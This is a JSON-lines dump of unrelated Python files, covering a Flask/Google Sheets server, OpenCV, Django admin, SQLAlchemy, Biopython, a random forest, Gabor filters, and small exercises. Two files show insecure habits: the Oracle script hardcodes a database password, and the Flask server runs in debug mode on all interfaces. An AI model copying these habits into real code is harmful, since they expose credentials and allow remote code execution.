self.begin('marry.db/service')\n\n try:\n params = (\n name,\n contents\n )\n\n proxy.execute(\"\"\"\n INSERT INTO guest_books\n (name, contents, createdate)\n VALUES\n (%s, %s, sysdate())\n \"\"\", params)\n\n proxy.commit()\n\n return True\n\n except Exception as e:\n proxy.rollback()\n\n self.logging.exception(e)\n\n return False","sub_path":"model/bjs/board/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"271409553","text":"from __future__ import print_function\nfrom googleapiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client import file, client, tools\nimport flask\nfrom flask import request, jsonify\nfrom flask_cors import CORS\nimport pickle\nimport os.path\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\nfrom datetime import datetime\n\n# If modifying these scopes, delete the file token.pickle.\nSHEET_SCOPES = ['https://www.googleapis.com/auth/spreadsheets.readonly']\n\nDOOR_KNOCKING_SPREADSHEET_ID = '15NkVPeWOJvkDwY8tPCPhX16bDk9m2_TjU-ioGHa3LnY'\nDOOR_KNOCKING_RANGE = 'Kontakt/samtaler!K2:M9'\nFULL_RANGE = 'Kontakt/samtaler!A1:I100'\n\ndef setupSheetsService():\n store = file.Storage('token-sheets.json')\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets('credentials-sheets.json', SHEET_SCOPES)\n creds = tools.run_flow(flow, store)\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n\n return build('sheets', 'v4', credentials=creds)\n\ndef getDoorKnockingStats():\n service = setupSheetsService()\n sheet = service.spreadsheets()\n result = sheet.values().get(spreadsheetId=DOOR_KNOCKING_SPREADSHEET_ID,\n range=DOOR_KNOCKING_RANGE).execute()\n return result.get('values')\n\ndef getFullDoorKnockingStats():\n service = setupSheetsService()\n sheet = service.spreadsheets()\n result = sheet.values().get(spreadsheetId=DOOR_KNOCKING_SPREADSHEET_ID,\n range=FULL_RANGE).execute()\n return result.get('values')\n\nif __name__ == '__main__':\n server = flask.Flask(__name__)\n CORS(server)\n server.config[\"DEBUG\"] = True\n\n\n @server.route('/', methods=['GET'])\n def home():\n return \"it works!\"\n\n @server.route('/doors', methods=['GET'])\n def doorStats():\n return jsonify(getDoorKnockingStats())\n\n @server.route('/doors/extended', methods=['GET'])\n def fullDoorStats():\n return jsonify(getFullDoorKnockingStats())\n\n server.run(host='0.0.0.0')\n","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"4203365","text":"import numpy as np\nimport cv2\nfrom itertools import count\n\ndef combine(img1, img2):\n vis = np.concatenate((img1, img2), axis=0)\n return vis\n\n# cap = cv2.VideoCapture('/mnt/hgfs/Desktop/trimmed1.mov')\ncap = cv2.VideoCapture('/mnt/hgfs/Desktop/brain_wash_10_14_2014.mp4')\n# cap = cv2.VideoCapture('./slow_brain_wash_10_14_2014.avi')\n# cap = cv2.VideoCapture('./video.avi')\ndef get_mean(filename):\n cap = cv2.VideoCapture(filename)\n ret, frame = cap.read()\n sum_frame = frame.astype('float32')\n counter = 1\n while ret:\n counter += 1\n sum_frame += frame\n ret, frame = cap.read()\n return (sum_frame / float(counter)).astype('uint8')\n \ndef main3():\n ret, frame1 = cap.read()\n for j in range(100):\n _, frame2 = cap.read()\n grayImage1 = cv2.cvtColor(frame1, cv2.COLOR_RGB2GRAY)\n grayImage2 = cv2.cvtColor(frame2, cv2.COLOR_RGB2GRAY)\n\n cornerMem = []\n cornerCount = 300\n qualityLevel = 0.1\n minDistance = 5\n cornerMem = cv2.goodFeaturesToTrack(grayImage1, cornerCount, qualityLevel, minDistance)\n\n nextPts, _, _ = cv2.calcOpticalFlowPyrLK(grayImage1, grayImage2, cornerMem, None)\n for p1, p2 in zip(cornerMem, nextPts):\n center1 = int(p1[0][0]), int(p1[0][1])\n center2 = int(p2[0][0]), int(p2[0][1])\n cv2.circle(frame2, (center2), 2, (0,255,255))\n cv2.circle(frame2, (center1), 2, (0,255,255))\n cv2.line(frame2, center1, center2, (128,128,128))\n\n cv2.imshow('frame', frame2)\n while True:\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n\n cap.release()\n cv2.destroyAllWindows()\n \n\ndef main():\n sum_frame = get_mean('./slow_brain_wash_10_14_2014.avi')\n cv2.imwrite('output.jpg', sum_frame)\n\n \ndef main2():\n background = cv2.imread('output.jpg')\n fgbg = cv2.BackgroundSubtractorMOG2(10,100,128)# (10, 50, 0.5)\n fgbg2 = cv2.BackgroundSubtractorMOG2(10,100,128)\n fgbg.apply(background)\n fgbg2.apply(background)\n\n for i in count(1):\n ret, frame = cap.read()\n # if i % 100 == 0:\n # fgbg2 = cv2.BackgroundSubtractorMOG2(1,10,128)\n if i % 1 == 0:\n fgmask = fgbg.apply(frame)\n fgmaskcolor = cv2.cvtColor(fgmask, cv2.COLOR_GRAY2BGR)\n\n fgmask2 = fgbg2.apply(frame)\n fgmaskcolor2 = cv2.cvtColor(fgmask2, cv2.COLOR_GRAY2BGR)\n\n fgmaskcolor2 -= fgmaskcolor\n\n # cv2.imshow('frame',fgmask)\n cv2.imshow('frame',reduce(combine, [frame, fgmaskcolor, fgmaskcolor2]))\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main3()\n","sub_path":"python/cv/background_subtraction.py","file_name":"background_subtraction.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"261442328","text":"import math\nimport rolldice\nfrom consts import *\n\ndef abilityMod(score):\n return math.floor((score-10)/2)\n\ndef getSkillCheckRoll(self, check, advantage):\n # Handle Advantage\n if advantage in [\"adv\", \"advantage\", \"a\"]:\n adv = \"K\"\n num = 2\n elif advantage in [\"dis\", \"disadvantage\", \"d\"]:\n adv = \"k\"\n num = 2\n else:\n adv = \"\"\n num = 1\n\n # Skill Check\n if check in skills:\n # Header Print for Skill Check\n for i in categories:\n if check in categories[i]:\n mod = abilityMod(self.abilities[i])\n if check in self.proficiencies:\n mod += self.pb\n modStr = f\"{str(mod)}\"\n if mod >= 0:\n modStr = f\"+{str(mod)}\"\n print(f\"\\n\\n{self.pname} Skill Check: {color.BOLD}{check}{color.END} ({modStr})\")\n roll = rolldice.roll_dice(f'{num}d20{adv} + {mod}')\n print(bigNums[roll[0]])\n \n # Ability Check\n elif check in abilities:\n mod = abilityMod(self.abilities[check])\n modStr = f\"{str(mod)}\"\n if mod >= 0:\n modStr = f\"+{str(mod)}\"\n print(f\"\\n\\n{self.pname} Ability Check: {color.BOLD}{ablLong[check]}{color.END} ({modStr})\")\n roll = rolldice.roll_dice(f'{num}d20{adv} + {mod}')\n print(bigNums[roll[0]])\n \n # Unrecognized Input\n else:\n print(f\"{check} is not a valid skill or ability.\")","sub_path":"ability.py","file_name":"ability.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"279794319","text":"# -*- coding: utf-8 -*-\n\nfrom django import template\nfrom django.conf.urls.defaults import url, patterns\nfrom django.contrib import admin\nfrom django.contrib.admin.util import unquote\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.urlresolvers import reverse\nfrom django.http import Http404, HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.utils.encoding import force_unicode\nfrom django.utils.html import escape\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.context_processors import request\n\nclass ModelAdminViewMixin(object):\n '''\n Add view only functionality for database object.\n Allows you to override view templates similar to ModelAdmin rules.\n Change permissions check for changelist_view - allow acces \n to changelist with only view permission. Check view permissions form model \n according to pattern view_MODELNAMELOWERCASE.\n \n Additional permission view_row_MODELNAMELOWERCASE allows access only to view page\n without changelist. It is also wrap change_view and redirect all queries with \n view_row_* only permission to the view page.\n \n NOTICE! This mixin change standard permission check in order to gain access to\n changelist vith only view permission.\n I hope this will not affect site security :) \n \n View templates paths are:\n dadds/admin/row_view.html\n admin/APP_LABEL/row_view.html\n admin/APP_LABEL/MODEL_NAME/row_view.html\n \n Reverse url name is APP_MODEL_view\n \n #Usage\n class MyModelAdmin(ModelAdminViewMixin, ModelAdmin):\n pass\n '''\n \n # Path to custom view template\n object_view_template = None\n \n def __init__(self, *args, **kwards):\n self.changelist_view = self.changelist_view_wrapper(self.changelist_view)\n self.change_view = self.change_view_wrapper(self.change_view)\n super(ModelAdminViewMixin, self).__init__(*args, **kwards)\n \n def changelist_view_wrapper(self, changelist_vew):\n \"\"\"\n Wrap changelist to allow changelist avaliable with only view permission.\n On any POST query standard permission check used.\n \"\"\"\n def wrapper(request, *args, **kwargs):\n tmp_has_change_permission = None\n result = None\n \n if not request.method == 'POST':\n tmp_has_change_permission = self.has_change_permission\n self.has_change_permission = self.has_view_permission\n \n result = changelist_vew(request, *args, **kwargs)\n \n if not tmp_has_change_permission is None:\n self.has_change_permission = tmp_has_change_permission\n \n return result\n return wrapper\n \n def change_view_wrapper(self, change_view):\n \"\"\"\n Wrapper around change_view.\n Redirect all queries with view_row_MODELNAMELOWERCASE only permission to the row view page \n \"\"\"\n def wrapper(request, object_id, *args, **kwargs):\n obj = self.get_object(request, unquote(object_id))\n \n if not self.has_change_permission(request, obj) and self.has_view_permission(request, obj, _view_row_perm=True):\n opts = self.opts\n return HttpResponseRedirect(reverse('admin:%s_%s_view' % (opts.app_label, opts.module_name), args=[object_id]))\n \n return change_view(request, object_id, *args, **kwargs)\n return wrapper\n \n def get_model_perms(self, request):\n \"\"\"\n Override standard change permission (hope this will help to display link in dashboard)\n Add new view permission to common model permissions \n \"\"\"\n perms = super(ModelAdminViewMixin, self).get_model_perms(request)\n perms['change'] = self.has_view_permission(request)\n perms['view'] = self.has_view_permission(request, _view_row_perm=True)\n return perms\n \n def get_urls(self):\n \"\"\"\n Adds row view to the urls\n \"\"\"\n urls = super(ModelAdminViewMixin, self).get_urls()\n info = self.model._meta.app_label, self.model._meta.module_name\n my_urls = patterns('',\n url(r'^(.+)/view/$', admin.site.admin_view(self.row_view), name='%s_%s_view' % info),\n )\n return my_urls + urls\n \n def get_view_extra_context(self, request, obj=None):\n \"\"\"\n Returns extra context for view row template.\n You can implement this function to add custom data to the template.\n For example you can process here data from linked models.\n \"\"\"\n pass\n \n def has_view_permission(self, request, obj=None, _view_row_perm=False):\n \"\"\"\n Check if user has view permissions.\n You can override this method to correct access check.\n I'm recommended to add model permission name 'view_MODELNAMELOWERCASE'\n this method will check it by default.\n \"\"\"\n opts = self.opts\n perms = ['%s.view_%s' % (opts.app_label, opts.object_name.lower()), '%s.%s' % (opts.app_label, opts.get_change_permission())]\n if _view_row_perm:\n perms.append('%s.view_row_%s' % (opts.app_label, opts.object_name.lower()))\n \n for perm in perms:\n if request.user.has_perm(perm):\n return True\n return False \n \n def row_view(self, request, object_id, extra_context=None):\n \"\"\" Render object view page \"\"\"\n opts = self.model._meta\n app_label = opts.app_label\n \n obj = self.get_object(request, unquote(object_id))\n\n if not self.has_view_permission(request, obj, _view_row_perm=True):\n raise PermissionDenied\n \n if obj is None:\n raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {'name': force_unicode(opts.verbose_name), 'key': escape(object_id)})\n\n context = {\n 'app_label': opts.app_label,\n 'fields': self.get_model_instance_fields(obj),\n 'has_change_permission': self.has_change_permission(request),\n 'has_delete_permission': self.has_delete_permission(request),\n 'instance': obj,\n 'opts': opts,\n 'title': _('View %s #%s') % (opts.verbose_name, obj.pk),\n } \n context.update(extra_context or {}) \n context.update(self.get_view_extra_context(request, obj) or {}) \n context_instance = template.RequestContext(request, current_app=self.admin_site.name)\n return render_to_response(self.object_view_template or [\n 'admin/%s/%s/row_view.html' % (app_label, opts.object_name.lower()),\n 'admin/%s/row_view.html' % app_label,\n 'dadds/admin/row_view.html'\n ], context, context_instance=context_instance)\n \n def get_model_instance_fields(self, obj):\n \"\"\"\n Returns a list of all field names on the instance.\n You may use this method to list sub models fields in get_view_extra_context.\n \"\"\"\n from django.db.models.fields.files import FieldFile\n fields = []\n for f in obj._meta.fields:\n fname = f.name \n # resolve picklists/choices, with get_xyz_display() function\n get_choice = 'get_' + fname + '_display'\n is_file = False\n if hasattr(obj, get_choice):\n value = getattr(obj, get_choice)()\n else:\n try :\n value = getattr(obj, fname)\n if isinstance(value, FieldFile):\n is_file = True\n except obj.DoesNotExist:\n value = None\n\n fields.append({\n 'label':f.verbose_name,\n 'name':f.name,\n 'value':value,\n 'is_file':is_file,\n })\n return fields\n","sub_path":"dadds/admin/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":7978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"471636294","text":"import contextlib\n\nimport redis\nfrom sqlalchemy import orm, engine_from_config\n\nfrom config import Config\n\n__all__ = [\"db\", \"session\"]\n\n\n@contextlib.contextmanager\ndef session():\n \"\"\"\n Provide a transactional scope around a series of operations\n \"\"\"\n s = db.Session()\n try:\n yield s\n s.commit()\n except:\n s.rollback()\n raise\n finally:\n s.close()\n\n\nclass SqlAlchemy(object):\n \"\"\"\n 数据库包装类\n \"\"\"\n\n def __init__(self):\n self._engine = engine_from_config(Config[\"database\"])\n self._session_factory = orm.sessionmaker(bind=self._engine, expire_on_commit=False)\n self.Session = orm.scoped_session(session_factory=self._session_factory)\n self.Redis = self.init_redis()\n\n def init_tables(self):\n from db.models import Model\n Model.metadata.create_all(self._engine)\n\n @staticmethod\n def init_redis():\n pool = redis.ConnectionPool(**Config[\"redis\"])\n return redis.Redis(connection_pool=pool)\n\n\ndb = SqlAlchemy()\n","sub_path":"db/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"497289420","text":"from reportlab.lib import colors\nfrom reportlab.lib.units import cm\nfrom Bio.Graphics import GenomeDiagram\nfrom Bio import SeqIO\n\nrecord = SeqIO.read(\"Genome.gb\", \"genbank\")\n\n#creating empty diagram, empty track, and empty feature set\ngd_diagram = GenomeDiagram.Diagram(\"Tomato Curly Stunt Virus\")\ngd_track_for_features = gd_diagram.new_track(1, name = \"Annotated Features\")\ngd_feature_set = gd_track_for_features.new_set()\n\n#taking each gene in record and generating feature on the diagram\nfor feature in record.features:\n if feature.type != \"gene\":\n continue\n if len(gd_feature_set) % 2 == 0:\n color = colors.blue\n else:\n color = colors.lightblue\n gd_feature_set.add_feature(feature, color = color, label = True, label_size = 14, label_angle = 0)\n\n#making output file\ngd_diagram.draw(\n format = \"circular\",\n circular = True,\n pagesize = (20 * cm, 20 * cm),\n start = 0,\n end = len(record),\n circle_core = 0.7,\n)\ngd_diagram.write(\"genome_map.png\", \"PNG\") \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"93034684","text":"import csv\nimport math\nimport random\nfrom collections import defaultdict\nfrom collections import Counter\nfrom typing import *\n\nimport numpy as np\nfrom sklearn import tree\nfrom sklearn.impute import SimpleImputer\n\nclass DataItem:\n def __init__(self, row: list):\n self.attributes = [None] * 13\n for i in range(len(self.attributes)):\n self.attributes[i] = None if row[i] == \"?\" else row[i]\n self.final_class = row[len(row) - 1]\n\n def __str__(self):\n return str(self.attributes) + \", \" + str(self.final_class)\n\nclass DecisionTree:\n def __init__(self, train_mas: List[DataItem], trees_depth: int):\n n_attributes = len(train_mas[0].attributes)\n\n self.attr_subset_indexes = random.sample(range(n_attributes), trees_depth)\n attribute_subset = [subset_by_indexes(item.attributes, self.attr_subset_indexes) for item in train_mas]\n\n classes = [item.final_class for item in train_mas]\n\n self.sk_dec_tree = tree.DecisionTreeClassifier()\n self.sk_dec_tree.fit(attribute_subset, classes)\n\n def predict(self, X) -> list:\n X = [subset_by_indexes(attrs, self.attr_subset_indexes) for attrs in X]\n return self.sk_dec_tree.predict(X)\n\nclass decision_forest:\n def __init__(self, decision_trees: List[DecisionTree]):\n self.decision_trees = decision_trees\n\n def predict(self, X) -> list:\n vote_table = zip(*[dec_tree.predict(X) for dec_tree in self.decision_trees])\n return [Counter(votes).most_common(1)[0][0] for votes in vote_table]\n\ndef read_csv_file(file: str) -> List[DataItem]:\n with (open(file)) as csv_file:\n reader = csv.reader(csv_file)\n next(reader)\n return [DataItem(row) for row in reader]\n\ndef fill_missing_attributes(data: List[DataItem]) -> List[DataItem]:\n imp = SimpleImputer(missing_values=np.nan, strategy='mean')\n attributes = [item.attributes for item in data]\n imp = imp.fit_transform(attributes)\n return [DataItem([*imp[i], data[i].final_class]) for i in range(len(data))]\n\ndef initialize():\n full_data_mas = read_csv_file('heart_data.csv')\n full_data_mas = fill_missing_attributes(full_data_mas)\n return full_data_mas\n\ndef subset_by_indexes(l: list, indexes: List[int]) -> list:\n return [l[i] for i in indexes]\n\ndef split_data(data: List[DataItem], train_mas_ratio: float) -> Tuple[List[DataItem], List[DataItem]]:\n n = len(data)\n n_training = int(n * train_mas_ratio)\n\n grouped_by_class = defaultdict(list)\n for entry in data:\n grouped_by_class[entry.final_class].append(entry)\n classes = list(grouped_by_class.keys())\n\n train_mas = []\n test_mas = []\n\n class_i = 0\n for i in range(n):\n class_i = (class_i + 1) % len(classes)\n final_class = classes[class_i]\n group = grouped_by_class[final_class]\n if len(group) == 0:\n classes.remove(final_class)\n continue\n\n group.pop\n item = group.pop(random.randint(0, len(group) - 1))\n target_data = train_mas if i < n_training else test_mas\n target_data.append(item)\n\n return train_mas, test_mas\n\ndef main():\n optimal_iteration = 0\n optimal_trees = 0\n optimal_depth = 0\n optimal_average = 0\n iterations = 1\n while iterations <= 10:\n average = 0\n full_data_mas = initialize()\n (train_mas, test_mas) = split_data(full_data_mas, 0.7)\n trees_count = 10\n while trees_count <= 50:\n trees_depth = 2\n while trees_depth <= 8:\n correct_precisions = 0\n decision_trees = [DecisionTree(train_mas, trees_depth) for i in range(trees_count)]\n decision_trees_forest = decision_forest(decision_trees)\n predicted: list = decision_trees_forest.predict([item.attributes for item in test_mas])\n for i in range(len(predicted)):\n if predicted[i] == test_mas[i].final_class:\n correct_precisions = correct_precisions + 1\n print(\"Iteration:\" + str(iterations) + \" Trees:\" + str(trees_count) + \" Depth:\" + str(trees_depth) +\" Result:\" + str(correct_precisions / len(test_mas)))\n if correct_precisions / len(test_mas) > optimal_average:\n optimal_iteration = iterations\n optimal_average = (correct_precisions / len(test_mas))\n optimal_trees = trees_count\n optimal_depth = trees_depth\n average += (correct_precisions / len(test_mas))\n trees_depth += 1\n trees_count += 10\n print(\"Average for Iteration\" + str(iterations) + \" \" + str(average / 350))\n iterations += 1\n print(\"Optmal parametrs:\" + \"Iteration: \" + str(optimal_iteration) + \" Trees: \" + str(optimal_trees) + \" Depth: \" + str(optimal_depth) + \" Precisions: \" + str(optimal_average))\n\n\nif __name__ == '__main__':\n main()\n exit()\n","sub_path":"Lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":4957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"455807717","text":"from __future__ import division\nimport matlab.engine\nimport matlab\nimport pylab as pl\nimport numpy as np\nfrom math import pi\n\neng = matlab.engine.start_matlab()\neng.cd(r'/home/paharov/CSNL/gabor/matlab_scripts/gabor_ind/')\n\ndef get_gabor_feats():\n a = []\n thetas = 4\n xs = 8\n ys = 8\n for sig in range(2):\n for lam in range(2):\n for thet in range(thetas):\n for loc_x in range(xs):\n for loc_y in range(ys):\n a.append(np.ndarray.flatten(np.asarray(eng.eval(\"gabor_b('theta', \"\n + str((thet*pi)/thetas) + \", 'lambda', \"\n + str((4/(sig+1))/(0.2*(lam+1))) + \", 'Sigma', \" + str(4/((sig/2)+1)+4) +\n \", 'width', 32, 'height', 32, 'px', \" + str((1/(xs-1))*loc_x) +\n \", 'py', \" + str((1/(ys-1))*loc_y) + \")\"))))\n return a\n\nif __name__ == '__main__':\n def get_gabor_feats_plt():\n a = []\n thetas = 4\n xs = 8\n ys = 8\n for sig in range(2):\n for lam in range(2):\n for thet in range(thetas):\n for loc_x in range(xs):\n for loc_y in range(ys):\n a.append(eng.eval(\"gabor_b('theta', \"\n + str((thet*pi)/thetas) + \", 'lambda', \"\n + str((4/(sig+1))/(0.2*(lam+1))) + \", 'Sigma', \" + str(4/((sig/2)+1)+4) +\n \", 'width', 32, 'height', 32, 'px', \" + str((1/(xs-1))*loc_x) +\n \", 'py', \" + str((1/(ys-1))*loc_y) + \")\"))\n return a\n\n a = get_gabor_feats_plt()\n for n in range(32):\n # Plots the simple pixel filters\n f = pl.figure(facecolor='white')\n #pl.title('Feature bank (simple lines, 16x16)')\n pl.tick_params(axis='both', which='both', bottom='off', top='off', left='off',\n labelleft='off', labelbottom='off', right='off')\n pl.axis('off')\n for i in range(32):\n f.add_subplot(4, 8, i+1)\n pl.imshow(a[i+(n*32)], cmap='Greys_r', interpolation='nearest', vmin=-1, vmax=1)\n pl.tick_params(axis='both', which='both', bottom='off', top='off', left='off',\n labelleft='off', labelbottom='off', right='off')\n pl.savefig('/home/paharov/CSNL/gabor/gabor02/img02/feat_bank' + str(n) + '.png')\n pl.close()\n #pl.show()\n","sub_path":"code/filter05.py","file_name":"filter05.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"580181284","text":"from __future__ import unicode_literals\nimport CClass\n\n\nclass Command(object):\n \"\"\" Command-line work\n \"\"\"\n\n def __init__(self):\n self._functions = {\n 0: self.exit_cmd,\n 3: self.square,\n 2: self.perimeter,\n 1: self.insc_desc,\n }\n self._prompt = \"Введите номер команды из списка и нажмите ENTER:\\n\"\n for key, cmd in self._functions.items():\n self._prompt += \"\"\"{0}: {1}\\n\"\"\".format(key, cmd.__doc__.strip())\n\n def hello_cmd(self):\n \"\"\"\n Добро пожаловать!\n :return str:\n \"\"\"\n prompt = \"Добро пожаловать!\\n\" + self._prompt\n return prompt\n\n def exit_cmd(self):\n \"\"\" выход\n \"\"\"\n print(\"До свидания!\")\n exit()\n\n def nazad(self):\n \"\"\" назад\n \"\"\"\n self.run()\n\n def unknown_cmd(self):\n \"\"\"\n Получена неизвестная команда!\n :return str:\n \"\"\"\n prompt = \"Получена неизвестная команда!\" + self._prompt\n return prompt\n\n\n def insc_desc(self):\n \"\"\" вписана или описана окружность\n \"\"\"\n\n def insc_desc_square_rectangle():\n \"\"\" окружность вписана или описана окола квадрата\n \"\"\"\n rectangl = CClass.Rectangle()\n rectangl.width = float(input(\"Ширина = \"))\n rectangl.height = float(input(\"Высота = \"))\n circle = CClass.Circle()\n circle.radius = float(input(\"Радиус = \"))\n if rectangl.width == rectangl.height:\n if CClass.inscribed_square_rectangle(rectangl, circle):\n return \"Окружность вписана в квадрат\"\n elif CClass.described_square_rectangle(rectangl, circle):\n return \"Окружность описана около квадрата\"\n else:\n return \"Окружность и не вписана и даже не \" \\\n \"описана окола квадрата\"\n else:\n return \"Данные введены не верно\"\n\n def insc_desc_square_triangle():\n \"\"\" окружность вписана или описана окола треугольника\n \"\"\"\n triangle = CClass.Triangle()\n triangle.katet = (float(input(\"1 катет = \")),\n float(input(\"2 катет = \")),\n float(input(\"3 катет = \"))\n )\n circle = CClass.Circle()\n circle.radius = float(input(\"Радиус = \"))\n if triangle._params[\"katet\"][0] == triangle._params[\"katet\"][1] == \\\n triangle._params[\"katet\"][2]:\n if CClass.inscribed_triangle(circle, triangle):\n return \"Окружность вписана в треугольник\"\n elif CClass.described_triangle(circle, triangle):\n return \"Окружность описана около треугольника\"\n else:\n return \"Окружность не вписана и даже не \" \\\n \"описана окола треугольника\"\n else:\n return \"Данные введены не верно \\n\\n\"\n\n functions = {\n 2: insc_desc_square_rectangle,\n 1: insc_desc_square_triangle,\n 0: self.nazad,\n }\n prompt2 = \"Введите номер и нажмите ENTER:\\n\"\n for key, cmd in functions.items():\n prompt2 += \"\"\"{0}: {1}\\n\"\"\".format(key, cmd.__doc__.strip())\n print(prompt2)\n i = 1\n while i:\n i = int(input())\n result = functions.get(i, self.unknown_cmd)()\n print(result, \"\\n\")\n\n def run(self):\n \"\"\" Запуск командного режима\n \"\"\"\n i = 1\n print(self.hello_cmd())\n while i:\n i = int(input())\n result = self._functions.get(i, self.unknown_cmd)()\n print(result, \"\\n\")\n\n\n def perimeter(self):\n \"\"\" найти периметр фигуры\n \"\"\"\n\n def circle_perimeter():\n \"\"\" круг\n \"\"\"\n circle = CClass.Circle()\n circle.radius = float(input(\"Радиус = \"))\n return circle.get_length()\n\n def triangle_perimeter():\n \"\"\" треугольник\n \"\"\"\n triangle = CClass.Triangle()\n triangle.katet = (float(input(\"1 катет = \")),\n float(input(\"2 катет = \")),\n float(input(\"3 катет = \"))\n )\n return triangle.get_perimeter()\n\n def rectangle_perimeter():\n \"\"\" квадрат - прямоугольник\n \"\"\"\n rectangl = CClass.Rectangle()\n rectangl.width = float(input(\"Ширина = \"))\n rectangl.height = float(input(\"Высота = \"))\n return rectangl.get_perimeter()\n functions = {\n 3: circle_perimeter,\n 2: rectangle_perimeter,\n 1: triangle_perimeter,\n 0: self.nazad,\n }\n prompt3 = \"Введите номер фигуры и нажмите ENTER:\\n\"\n for key, cmd in functions.items():\n prompt3 += \"\"\"{0}: {1}\\n\"\"\".format(key, cmd.__doc__.strip())\n print(prompt3)\n i = 1\n while i:\n i = int(input())\n result = functions.get(i, self.unknown_cmd)()\n print(\"периметр = \", result, \"\\n\")\n\n\n def square(self):\n \"\"\" найти площадь фигуры\n \"\"\"\n\n def circle_square():\n \"\"\" круг\n \"\"\"\n circle = CClass.Circle()\n circle.radius = float(input(\"Радиус = \"))\n return circle.get_square()\n\n def triangle_square():\n \"\"\" треугольник\n \"\"\"\n triangle = CClass.Triangle()\n triangle.katet = (float(input(\"1 катет = \")),\n float(input(\"2 катет = \")),\n float(input(\"3 катет = \"))\n )\n return triangle.get_square()\n\n def rectangle_square():\n \"\"\" квадрат - прямоугольник\n \"\"\"\n rectangl = CClass.Rectangle()\n rectangl.width = float(input(\"Ширина = \"))\n rectangl.height = float(input(\"Высота = \"))\n return rectangl.get_square()\n\n functions = {\n 3: circle_square,\n 2: rectangle_square,\n 1: triangle_square,\n 0: self.nazad,\n }\n prompt4 = \"Введите номер фигуры и нажмите ENTER:\\n\"\n for key, cmd in functions.items():\n prompt4 += \"\"\"{0}: {1}\\n\"\"\".format(key, cmd.__doc__.strip())\n print(prompt4)\n i = 1\n while i:\n i = int(input())\n result = functions.get(i, self.unknown_cmd)()\n print(\"площадь = \", result, \"\\n\")\n\n\ncommand = Command()\ncommand.run()","sub_path":"figures/One.py","file_name":"One.py","file_ext":"py","file_size_in_byte":7522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"299289448","text":"#dbparam\r\n#applying paramaeterised queries.\r\n\r\nimport cx_Oracle\r\ncon=cx_Oracle.connect(\"sriram/mymouse#1@localhost/orcl\")\r\ncur=con.cursor()\r\ncur.prepare(\"select * from products where pid=:1\")\r\na=True\r\nwhile a:\r\n if a:\r\n pid=int(input(\"Enter a product Id\"))\r\n cur.execute(None,{'1':pid})\r\n data=cur.fetchall()\r\n print(len(data),\" Rows\")\r\n for k in data:\r\n print(k)\r\n\r\n b=input(\"Continue\")\r\n print(b,a)\r\n if b !=a:\r\n cur.close()\r\n con.close()\r\n break\r\n else:\r\n continue\r\n","sub_path":"Python Exercises/dbparam.py","file_name":"dbparam.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"410816249","text":"# [S/W 문제해결 기본] 5일차 - GNS\n\n# import sys\n# sys.stdin = open(\"GNS_test_input.txt\", 'r')\n\nsdict = {\"ZRO\": 0, \"ONE\": 1, \"TWO\": 2, \"THR\": 3, \"FOR\": 4,\n \"FIV\": 5, \"SIX\": 6, \"SVN\": 7, \"EGT\": 8, \"NIN\": 9}\n\nT = int(input())\nfor tc in range(1, T+1):\n tc_num, n = input().split()\n s = list(input().split())\n\n for i in range(len(s)-1, 0, -1):\n for j in range(i):\n if sdict[s[j]] > sdict[s[j+1]]:\n s[j], s[j+1] = s[j+1], s[j]\n\n print('#', tc, sep='')\n print(' '.join(s))","sub_path":"inSSAFY/SWEA/D3/GNS.py","file_name":"GNS.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"47736573","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /tmp/pip-install-n_sfyb/Django/django/db/models/sql/query.py\n# Compiled at: 2019-02-14 00:35:17\n\"\"\"\nCreate SQL statements for QuerySets.\n\nThe code in here encapsulates all of the SQL construction so that QuerySets\nthemselves do not have to (and could be backed by things other than SQL\ndatabases). The abstraction barrier only works one way: this module has to know\nall about the internals of models in order to get the information it needs.\n\"\"\"\nimport copy, warnings\nfrom collections import Counter, Iterator, Mapping, OrderedDict\nfrom itertools import chain, count, 